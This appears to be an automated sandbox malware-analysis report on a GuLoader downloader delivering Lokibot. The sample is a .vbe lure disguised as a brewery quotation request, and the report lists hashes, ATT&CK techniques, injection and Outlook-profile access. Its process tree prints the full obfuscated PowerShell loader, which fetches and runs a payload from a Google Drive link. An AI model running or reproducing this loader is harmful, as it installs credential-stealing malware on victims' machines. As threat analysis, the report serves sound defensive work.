guloader | 3731b0bc8e7b933ac2b9c647677f7a2856691c7b70697ccb3f7fe468b4627e28

General

Target

INVITACIÓN A COTIZAR Nueva cervecería NUEVA CERVECERÍA09-09-2024.vbe
Size

25KB
MD5

00e37725a3f758b23993a21b1ccb2d70
SHA1

c37411d16f916077438e9eeecbf6156be34b0530
SHA256

7d7c44eb94e4de1f69917adaeda0b47149ae93a212a6de4defaa865e9669c6ee
SHA512

8764bc8a0b6e4af0d34ec04b9547f6541bb9d57f475af73474f8bc9a4b8a935fba328deac09c7a5a65085f311915f5ebd5fe1a1152ac0cc1b47b59163d9016e5
SSDEEP

384:XkdmF6RYrwIiahDmhp7qr0PG3FLeakT55TGZ45h20aTywD6JbKQxN:XrF6RuhDmv7Boe75FGOhWVguQxN

Score

10^/10

guloader lokibot collection credential_access discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	3896	powershell.exe
17	3896	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2716	powershell.exe
3896	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	drive.google.com
14	drive.google.com
34	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4972	wab.exe
4972	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2716	powershell.exe
4972	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2716 set thread context of 4972	2716	powershell.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3896	powershell.exe
3896	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	4972	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 3896	2728	WScript.exe	88
PID 2728 wrote to memory of 3896	2728	WScript.exe	88
PID 3896 wrote to memory of 3400	3896	powershell.exe	90
PID 3896 wrote to memory of 3400	3896	powershell.exe	90
PID 3896 wrote to memory of 2716	3896	powershell.exe	96
PID 3896 wrote to memory of 2716	3896	powershell.exe	96
PID 3896 wrote to memory of 2716	3896	powershell.exe	96
PID 2716 wrote to memory of 3592	2716	powershell.exe	99
PID 2716 wrote to memory of 3592	2716	powershell.exe	99
PID 2716 wrote to memory of 3592	2716	powershell.exe	99
PID 2716 wrote to memory of 4972	2716	powershell.exe	100
PID 2716 wrote to memory of 4972	2716	powershell.exe	100
PID 2716 wrote to memory of 4972	2716	powershell.exe	100
PID 2716 wrote to memory of 4972	2716	powershell.exe	100
PID 2716 wrote to memory of 4972	2716	powershell.exe	100

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVITACIÓN A COTIZAR Nueva cervecería NUEVA CERVECERÍA09-09-2024.vbe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiopelvimetry='Prenoon';$Homolegalis=${host}.Runspace;If ($Homolegalis) {$Havestuen++;$Radiopelvimetry+='Endocystitis';$Tratterne='su';$Radiopelvimetry+='Undriven';$Tratterne+='bs';$Radiopelvimetry+='Regal';$Tratterne+='tri';$Radiopelvimetry+='Akrostikonet';$Tratterne+='ng';};Function Tennisstjerners($Ceremonialize){$Udryddet=$Ceremonialize.Length-$Havestuen;For( $Tranquilest146=5;$Tranquilest146 -lt $Udryddet;$Tranquilest146+=6){$untranquillise+=$Ceremonialize.$Tratterne.'Invoke'( $Tranquilest146, $Havestuen);}$untranquillise;}function Imdekomnes($Folkevogn169){ & ($Folkebaade255) ($Folkevogn169);}$Lvfldende=Tennisstjerners 'vomerMTi skoD.miczBaretiForedlCudeilInsekacosea/O,ker5 reno.Milie0Diall smert( DaskW ocioisa,dsnGoalpdVolumoMac.rwEm.alsFll.s MonogNInvo.TDespo Staal1Nongr0Nonin..tamp0 bist;Katal Eul WSkarniSuccenDi,es6 Gg.p4Fow.e;Vlskd PentaxDistu6 Gi.g4Locow;Unsco OphtrAreo vfabri:Nocki1 Gast2Kelhe1Dri.n..kspa0Spryd)Helti Ronv,G U.aneGiggecNons.kKonvooFo,si/limma2Unfre0 .nfu1Inden0Trema0 osin1Lunch0S,ids1Kravl Klem.FCursiiSch lrOverleTwopefAnsvaoin.erxSenni/Micro1Genne2Phi,a1 Macr.Respa0 nde ';$Sicking=Tennisstjerners ' Dis USpatis HypeeFortrrTru,h-Prem,A ProggAthl.eProbln.aghjt inds ';$Imminute=Tennisstjerners ' To,dhTypeetPa,potLovmspSourdsHjert:Spill/Ke.fs/SketcdkrekorCait iRygsjv GrupeAkt.o.CointgAntheoFanc,oOpskrgcornelTe steL,erv.HvidmcNglesoEktodm Pres/Unfaru TermcSolve?deleseGirtaxUds,epMeldroWidg,rFejl.tDipte=Godked KnipoUnsegwMoonjnAlderlPutreoClimbaReverd.hugg&OplseiIdr fdJomfr=Picci1Aftern Ap exEncycZLocom-Transa,aburSSem,pkkn cezSoundQb,rneVAfkryfN.ckeh SelvsLicenW HistjMalacI koll Tuf h Angir JydeUFo,keXDermaGRedessFlagllAnaxojNaboi0Defea4UnderDTingsF FriloFerig3 Cat,aHygg. ';$Simplicitetens253=Tennisstjerners 'P.ome>Dalto ';$Folkebaade255=Tennisstjerners '.econiOutcue.onrexSympa ';$bulkskibe='Spisesituationerne';$Sluttish = Tennisstjerners ' Is ge forccSlabbh GldeoInter Pigme% PossaFor upDaasepBe.oedAc,laa haletSsteraTe in%Maski\TransEsensir Synoopinact EnkliStatekDesmieBitear,nchieBroncnTapr,9Requo4Selva.EpidiFMicrooAf odrdiver Aril&Tralu&Ove,c Accoe PeshcSprinh Se toForlo Pent,t.ejek ';Imdekomnes (Tennisstjerners 'Block$DwindgBrdfdlDevicoSkitjbRad,aaMaliglphosp: KbsvEM,nusx Ch.koNe essSta.utKlageo IndtsWeesaiKjortsMonot=Tuber(est acblokpmDe.byd Anpa C noz/BetatcNedsa Snowh$Md,daSPental Non,umarmotPrisetDisseiFr.dnsClojvhparat)nonre ');Imdekomnes (Tennisstjerners 'Chole$Sla egNglell V.ndoGenlsb Reu.ajacanlFundr:A,cepPBeforaJuliolKuldeeForsto ,rdem b.ndaRodknmR,tunm SakeoK rnil.pildo SprigSandeiCattisPeng.taboli= Weft$RearbISammemVolummJ,rnmitraktnSoignu,onextKursuePirat.MedinsHjemfp BestlIslttiMarketHalsk( Pro.$ ForeSDer.liStranmBeardp dagtlKeyb.iPre,hcBeskyiTidsmtDerineUnde.t Rok,eHalsbnKvidrsForha2Extra5Hands3Skank) tori ');Imdekomnes (Tennisstjerners 'Dirt,[,targNTan.aeBrandtRefrn. ,pglSUnca eAntenr Dra.vGigtfiFjerncKrebieOver.P,jerroOrangiFlambnOver.t UndeM sti.a Fjern O doaCrillgforese HimmrMocam]Prel :lgmnd:NeuroSFor ae,kaftc onsuSkvadr Tredi NongtVent yTal oPuldgarg ssio Acest,acypoAfg,acCha.soChlorlGutte Aands=Blund H,sp[arakhNBoghoeChri,tStudi.slagtSSelvteDro pc.rallu SimrrBrysti uartAncreyAnne,P Defer UnmooAfsj.tUrac o Te rcFnaddoAre al Udr T enseyBl.rtpSk atePlati]De,ol: bron:Th.nkT Th.rlPhaeds Knob1 I ch2Yowes ');$Imminute=$Paleomammologist[0];$Hydrotype= (Tennisstjerners 'Tsori$ UndegParoll Fag oSyd,ebGru pa.ennelOmnin:FuldeT gaeto Shouw FdevlI.otoiSmuglnCosheeSc at=SubkuNGr,ekeBaadswChon - BarbO PinkbInfrajAssigeDiu ec Ce,atCetor Sub,iSHemasyFilmisRejnetSaxone DyvomCosi .SkndsNOmplae D metNonan. InteWSkolee.sychbUnsenCTovejlReliviOpg.ve KhitnAllert');$Hydrotype+=$Exostosis[1];Imdekomnes ($Hydrotype);Imdekomnes (Tennisstjerners 'Sags.$UngreTSpundo aagnwHaem.l StraiReattnxyloceSulba.SpermHFa.gseTilstaSkulddexpere,nchyrPl.tysLuref[Wo,ds$ .apiSAlkohiDishecDiasrk.redeiBrillnMoistgFarve]Triio= Pho,$XenopL,elsev,rndefA,dlelTrachd,ealteC.lsinostead ,ulieE kes ');$Assails151=Tennisstjerners 'Bar,a$Knip TLi,psoBa.ubw Lenzl,vstyihudkrnoldypeGross.ZelotDS oryo urdw ,idln.lgenlPoleno PredaLnkendR,speFIndaviConvelToddyeHayfo(M,usi$VedheIFore,m ca,imSpidsiDelinn Gtt uNasopt ShoreAbo e,Tjre $ BuggR hivaBowi,dDuod eCloakrHush e BarorLa.bdeSubsesDtdbl)Nu ri ';$Radereres=$Exostosis[0];Imdekomnes (Tennisstjerners 'Corco$Gama gChirol.altho SamobTildraOverqlOrner:,rnatC Misla rebud DealdReganiSi.htsxylope PededPr,du=Cykel(toothTOprrseHjlpesKvittt urh- LevePSysteaFolketEntithBrass tart$MolyfRLageraOlenid Kapie.nflurLucube ,erdrS rmieMu efsPhot ) Onyc ');while (!$Caddised) {Imdekomnes (Tennisstjerners ' uptu$Ex,isg orbilLucbaovaretbNag,sa EmbelUd pe:CopplNRefleeTolvtgT.opilTe poiKonsogFiaskjUndera Q,ay= park$CentrtirratrvascuuMouthe Ana. ') ;Imdekomnes $Assails151;Imdekomnes (Tennisstjerners 'DehumSEvnert miscaLanderUdrugtBooed- Str,SebolalSa.coe ElekeFundipFejel Ilexe4Rebaw ');Imdekomnes (Tennisstjerners 'Sphin$R ngdg muldlDe,utoTub,rb DentaBrazol tere:UforsCSharnaOocysdC.ofgd .vrvi Stens,haffeMetatd chub= Bnke( Ma aTFiksaeUncensSt,nstUbesv-Po.ycP ejeaSnaddtKar thMin,r Null.$BortfRriddeaVirtud,lamreCandurLivsfeKonderamigae BlresForry)Togol ') ;Imdekomnes (Tennisstjerners '.dsto$SaltkgTiggel ConioOve pbCloseaHeterlDeleg:Ap,stCInfanl SpagiIn tgn uop ihebetdUdbud=Urosc$BlephgDoz,llArbejoSk mlbVeteraRappelRecu :DobbeA eup,f Te.et miscnSted,eDejettSubst+ Rut,+Best,%.alle$KiselP RigsaR.bellPhospeStyreoThingmDenezaDu,semReshomKaloro PromlFlskeoMoonbgFilbeiArsonsisotrtSt.mk. Pro cunt,lo lgjeureamanApplitFredr ') ;$Imminute=$Paleomammologist[$Clinid];}$Reglens=330370;$Tranquilest146somorphisms=29655;Imdekomnes (Tennisstjerners 'S,nen$.ucidgAs molStewpoPiedfb Bo,iaEpithlR,sur:RabatB Labbnaggred TrolsScabelE,cogeOversrHospisInwre Bror= Bast DionyGBelkae.ucomt gaze- nalyC TeetoFlecknStepmtVillae slagncutintHyd.o Prjs$CommuRCond,aVib.adBev,deTrestrDudlee h,verMistre Unwhsleuco ');Imdekomnes (Tennisstjerners 'Hil,o$ iretgSkaftlBr,adoSiderb Val.aKlaeklHeter:AlodiF PlacoreturrAcrottHoba h beliiMo.osn V,vakFrgem une.t= tnke Hepat[TrykkSplansysurfysforsrt Ubehe Sam,mVic,r.PinchCA svaoAut gnTronev turbe TredrInf atIndaz].rkai:Storm:OverrFAartirCartwoUne,tmGrec B melaPuttesAnti.eBosn 6Scher4 ViscSPo ystTil,nrFlseriJaronnFiktigOmbej(Frihe$AnnulBEl.menU vemd ReagsT.baclGrdeseNoncorHypoksMudca)reimp ');Imdekomnes (Tennisstjerners 'b wle$ RudegPoolelHunhuoOprr,b ortyaPilpalSat,l:Pr.plEpret.nXenoprNonvaoThrifbDistaeUnco,dPreci pursi= ,nde Bluer[Unde.SSpeciyIliossS rcatLudbeeTolvamOrnit.StrepT frigeOfficxHe.latRifle.Bal aEleadenT,mpec WranoFestpdSfr ziUnconn UningAfgi,]C.vil:Bo.ts:Ubet,A Uds.SDe.ulCHa vtIHemotISkovb.ContrGPowereLu ttt CheeSristetDisberForgaiAnlgsnPulteg .eva( Tipv$ Ba,kFDei.ooUdh,gr PreatTaknihPianniSupponTeintkSyrn,)Unlin ');Imdekomnes (Tennisstjerners 'Bygni$L.knsgSk nkl.rguso .polbDetekaKaem,lSkyri: BeinKrenitaAfmarrMisacrCulchiUndete Playr odereB nnur KvalnAgateeBegra=Bgebl$Dgnc ELyd,rn.pitorPrivaoUnconbkoi.ceVerd.dMae.e.Ab,rts.nacruincaubBalsasS,adetB cklrAntibiDinnen UsikgUnobl(Prot.$ IndtRDivi.e,nhedgPhi,olEnchiePuzzlnSkinssIodin,L.jek$U,ravTBank.rMalinaBassinE.phoqGaff uDod.ci ,opilIntere.rnits isvatPrism1Augus4S,ire6DepensPlutuoOmarbmSticho Uk,irDesinpTil,uhRetrti Spars vvasmIndrysAnkyl)Per.n ');Imdekomnes $Karriererne;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3896
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Erotikeren94.For && echo t"
    3⤵
    PID:3400
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiopelvimetry='Prenoon';$Homolegalis=${host}.Runspace;If ($Homolegalis) {$Havestuen++;$Radiopelvimetry+='Endocystitis';$Tratterne='su';$Radiopelvimetry+='Undriven';$Tratterne+='bs';$Radiopelvimetry+='Regal';$Tratterne+='tri';$Radiopelvimetry+='Akrostikonet';$Tratterne+='ng';};Function Tennisstjerners($Ceremonialize){$Udryddet=$Ceremonialize.Length-$Havestuen;For( $Tranquilest146=5;$Tranquilest146 -lt $Udryddet;$Tranquilest146+=6){$untranquillise+=$Ceremonialize.$Tratterne.'Invoke'( $Tranquilest146, $Havestuen);}$untranquillise;}function Imdekomnes($Folkevogn169){ & ($Folkebaade255) ($Folkevogn169);}$Lvfldende=Tennisstjerners 'vomerMTi skoD.miczBaretiForedlCudeilInsekacosea/O,ker5 reno.Milie0Diall smert( DaskW ocioisa,dsnGoalpdVolumoMac.rwEm.alsFll.s MonogNInvo.TDespo Staal1Nongr0Nonin..tamp0 bist;Katal Eul WSkarniSuccenDi,es6 Gg.p4Fow.e;Vlskd PentaxDistu6 Gi.g4Locow;Unsco OphtrAreo vfabri:Nocki1 Gast2Kelhe1Dri.n..kspa0Spryd)Helti Ronv,G U.aneGiggecNons.kKonvooFo,si/limma2Unfre0 .nfu1Inden0Trema0 osin1Lunch0S,ids1Kravl Klem.FCursiiSch lrOverleTwopefAnsvaoin.erxSenni/Micro1Genne2Phi,a1 Macr.Respa0 nde ';$Sicking=Tennisstjerners ' Dis USpatis HypeeFortrrTru,h-Prem,A ProggAthl.eProbln.aghjt inds ';$Imminute=Tennisstjerners ' To,dhTypeetPa,potLovmspSourdsHjert:Spill/Ke.fs/SketcdkrekorCait iRygsjv GrupeAkt.o.CointgAntheoFanc,oOpskrgcornelTe steL,erv.HvidmcNglesoEktodm Pres/Unfaru TermcSolve?deleseGirtaxUds,epMeldroWidg,rFejl.tDipte=Godked KnipoUnsegwMoonjnAlderlPutreoClimbaReverd.hugg&OplseiIdr fdJomfr=Picci1Aftern Ap exEncycZLocom-Transa,aburSSem,pkkn cezSoundQb,rneVAfkryfN.ckeh SelvsLicenW HistjMalacI koll Tuf h Angir JydeUFo,keXDermaGRedessFlagllAnaxojNaboi0Defea4UnderDTingsF FriloFerig3 Cat,aHygg. ';$Simplicitetens253=Tennisstjerners 'P.ome>Dalto ';$Folkebaade255=Tennisstjerners '.econiOutcue.onrexSympa ';$bulkskibe='Spisesituationerne';$Sluttish = Tennisstjerners ' Is ge forccSlabbh GldeoInter Pigme% PossaFor upDaasepBe.oedAc,laa haletSsteraTe in%Maski\TransEsensir Synoopinact EnkliStatekDesmieBitear,nchieBroncnTapr,9Requo4Selva.EpidiFMicrooAf odrdiver Aril&Tralu&Ove,c Accoe PeshcSprinh Se toForlo Pent,t.ejek ';Imdekomnes (Tennisstjerners 'Block$DwindgBrdfdlDevicoSkitjbRad,aaMaliglphosp: KbsvEM,nusx Ch.koNe essSta.utKlageo IndtsWeesaiKjortsMonot=Tuber(est acblokpmDe.byd Anpa C noz/BetatcNedsa Snowh$Md,daSPental Non,umarmotPrisetDisseiFr.dnsClojvhparat)nonre ');Imdekomnes (Tennisstjerners 'Chole$Sla egNglell V.ndoGenlsb Reu.ajacanlFundr:A,cepPBeforaJuliolKuldeeForsto ,rdem b.ndaRodknmR,tunm SakeoK rnil.pildo SprigSandeiCattisPeng.taboli= Weft$RearbISammemVolummJ,rnmitraktnSoignu,onextKursuePirat.MedinsHjemfp BestlIslttiMarketHalsk( Pro.$ ForeSDer.liStranmBeardp dagtlKeyb.iPre,hcBeskyiTidsmtDerineUnde.t Rok,eHalsbnKvidrsForha2Extra5Hands3Skank) tori ');Imdekomnes (Tennisstjerners 'Dirt,[,targNTan.aeBrandtRefrn. ,pglSUnca eAntenr Dra.vGigtfiFjerncKrebieOver.P,jerroOrangiFlambnOver.t UndeM sti.a Fjern O doaCrillgforese HimmrMocam]Prel :lgmnd:NeuroSFor ae,kaftc onsuSkvadr Tredi NongtVent yTal oPuldgarg ssio Acest,acypoAfg,acCha.soChlorlGutte Aands=Blund H,sp[arakhNBoghoeChri,tStudi.slagtSSelvteDro pc.rallu SimrrBrysti uartAncreyAnne,P Defer UnmooAfsj.tUrac o Te rcFnaddoAre al Udr T enseyBl.rtpSk atePlati]De,ol: bron:Th.nkT Th.rlPhaeds Knob1 I ch2Yowes ');$Imminute=$Paleomammologist[0];$Hydrotype= (Tennisstjerners 'Tsori$ UndegParoll Fag oSyd,ebGru pa.ennelOmnin:FuldeT gaeto Shouw FdevlI.otoiSmuglnCosheeSc at=SubkuNGr,ekeBaadswChon - BarbO PinkbInfrajAssigeDiu ec Ce,atCetor Sub,iSHemasyFilmisRejnetSaxone DyvomCosi .SkndsNOmplae D metNonan. InteWSkolee.sychbUnsenCTovejlReliviOpg.ve KhitnAllert');$Hydrotype+=$Exostosis[1];Imdekomnes ($Hydrotype);Imdekomnes (Tennisstjerners 'Sags.$UngreTSpundo aagnwHaem.l StraiReattnxyloceSulba.SpermHFa.gseTilstaSkulddexpere,nchyrPl.tysLuref[Wo,ds$ .apiSAlkohiDishecDiasrk.redeiBrillnMoistgFarve]Triio= Pho,$XenopL,elsev,rndefA,dlelTrachd,ealteC.lsinostead ,ulieE kes ');$Assails151=Tennisstjerners 'Bar,a$Knip TLi,psoBa.ubw Lenzl,vstyihudkrnoldypeGross.ZelotDS oryo urdw ,idln.lgenlPoleno PredaLnkendR,speFIndaviConvelToddyeHayfo(M,usi$VedheIFore,m ca,imSpidsiDelinn Gtt uNasopt ShoreAbo e,Tjre $ BuggR hivaBowi,dDuod eCloakrHush e BarorLa.bdeSubsesDtdbl)Nu ri ';$Radereres=$Exostosis[0];Imdekomnes (Tennisstjerners 'Corco$Gama gChirol.altho SamobTildraOverqlOrner:,rnatC Misla rebud DealdReganiSi.htsxylope PededPr,du=Cykel(toothTOprrseHjlpesKvittt urh- LevePSysteaFolketEntithBrass tart$MolyfRLageraOlenid Kapie.nflurLucube ,erdrS rmieMu efsPhot ) Onyc ');while (!$Caddised) {Imdekomnes (Tennisstjerners ' uptu$Ex,isg orbilLucbaovaretbNag,sa EmbelUd pe:CopplNRefleeTolvtgT.opilTe poiKonsogFiaskjUndera Q,ay= park$CentrtirratrvascuuMouthe Ana. ') ;Imdekomnes $Assails151;Imdekomnes (Tennisstjerners 'DehumSEvnert miscaLanderUdrugtBooed- Str,SebolalSa.coe ElekeFundipFejel Ilexe4Rebaw ');Imdekomnes (Tennisstjerners 'Sphin$R ngdg muldlDe,utoTub,rb DentaBrazol tere:UforsCSharnaOocysdC.ofgd .vrvi Stens,haffeMetatd chub= Bnke( Ma aTFiksaeUncensSt,nstUbesv-Po.ycP ejeaSnaddtKar thMin,r Null.$BortfRriddeaVirtud,lamreCandurLivsfeKonderamigae BlresForry)Togol ') ;Imdekomnes (Tennisstjerners '.dsto$SaltkgTiggel ConioOve pbCloseaHeterlDeleg:Ap,stCInfanl SpagiIn tgn uop ihebetdUdbud=Urosc$BlephgDoz,llArbejoSk mlbVeteraRappelRecu :DobbeA eup,f Te.et miscnSted,eDejettSubst+ Rut,+Best,%.alle$KiselP RigsaR.bellPhospeStyreoThingmDenezaDu,semReshomKaloro PromlFlskeoMoonbgFilbeiArsonsisotrtSt.mk. Pro cunt,lo lgjeureamanApplitFredr ') ;$Imminute=$Paleomammologist[$Clinid];}$Reglens=330370;$Tranquilest146somorphisms=29655;Imdekomnes (Tennisstjerners 'S,nen$.ucidgAs molStewpoPiedfb Bo,iaEpithlR,sur:RabatB Labbnaggred TrolsScabelE,cogeOversrHospisInwre Bror= Bast DionyGBelkae.ucomt gaze- nalyC TeetoFlecknStepmtVillae slagncutintHyd.o Prjs$CommuRCond,aVib.adBev,deTrestrDudlee h,verMistre Unwhsleuco ');Imdekomnes (Tennisstjerners 'Hil,o$ iretgSkaftlBr,adoSiderb Val.aKlaeklHeter:AlodiF PlacoreturrAcrottHoba h beliiMo.osn V,vakFrgem une.t= tnke Hepat[TrykkSplansysurfysforsrt Ubehe Sam,mVic,r.PinchCA svaoAut gnTronev turbe TredrInf atIndaz].rkai:Storm:OverrFAartirCartwoUne,tmGrec B melaPuttesAnti.eBosn 6Scher4 ViscSPo ystTil,nrFlseriJaronnFiktigOmbej(Frihe$AnnulBEl.menU vemd ReagsT.baclGrdeseNoncorHypoksMudca)reimp ');Imdekomnes (Tennisstjerners 'b wle$ RudegPoolelHunhuoOprr,b ortyaPilpalSat,l:Pr.plEpret.nXenoprNonvaoThrifbDistaeUnco,dPreci pursi= ,nde Bluer[Unde.SSpeciyIliossS rcatLudbeeTolvamOrnit.StrepT frigeOfficxHe.latRifle.Bal aEleadenT,mpec WranoFestpdSfr ziUnconn UningAfgi,]C.vil:Bo.ts:Ubet,A Uds.SDe.ulCHa vtIHemotISkovb.ContrGPowereLu ttt CheeSristetDisberForgaiAnlgsnPulteg .eva( Tipv$ Ba,kFDei.ooUdh,gr PreatTaknihPianniSupponTeintkSyrn,)Unlin ');Imdekomnes (Tennisstjerners 'Bygni$L.knsgSk nkl.rguso .polbDetekaKaem,lSkyri: BeinKrenitaAfmarrMisacrCulchiUndete Playr odereB nnur KvalnAgateeBegra=Bgebl$Dgnc ELyd,rn.pitorPrivaoUnconbkoi.ceVerd.dMae.e.Ab,rts.nacruincaubBalsasS,adetB cklrAntibiDinnen UsikgUnobl(Prot.$ IndtRDivi.e,nhedgPhi,olEnchiePuzzlnSkinssIodin,L.jek$U,ravTBank.rMalinaBassinE.phoqGaff uDod.ci ,opilIntere.rnits isvatPrism1Augus4S,ire6DepensPlutuoOmarbmSticho Uk,irDesinpTil,uhRetrti Spars vvasmIndrysAnkyl)Per.n ');Imdekomnes $Karriererne;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Erotikeren94.For && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3592
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:4972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o0tsalil.u2n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Erotikeren94.For

Filesize
468KB

MD5
08bc7c56392625f9419e3fcc8e5e15f8

SHA1
939113f53c8b77721ec04d781c7320d5c2bbf4a5

SHA256
8b6c8459001e80aeaab8e8f354996e078f2b24af6981f5dc34a6092ec75126dc

SHA512
cbe1505c900ffe4985821a9dba3b165ada2e6612671b2c8ea0e06e5fad1bb1385f599224e203d8c4698c491cadddf86b2379e03c5549f441f239b83d6fc2dba4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\0f5007522459c86e95ffcc62f32308f1_c186ecc3-67e4-4d2b-8682-b6c322da87aa

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2392887640-1187051047-2909758433-1000\0f5007522459c86e95ffcc62f32308f1_c186ecc3-67e4-4d2b-8682-b6c322da87aa

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
memory/2716-37-0x0000000007240000-0x0000000007262000-memory.dmp

Filesize
136KB

Download
memory/2716-34-0x00000000079C0000-0x000000000803A000-memory.dmp

Filesize
6.5MB

Download
memory/2716-40-0x00000000085F0000-0x000000000ACFF000-memory.dmp

Filesize
39.1MB

Download
memory/2716-17-0x0000000002720000-0x0000000002756000-memory.dmp

Filesize
216KB

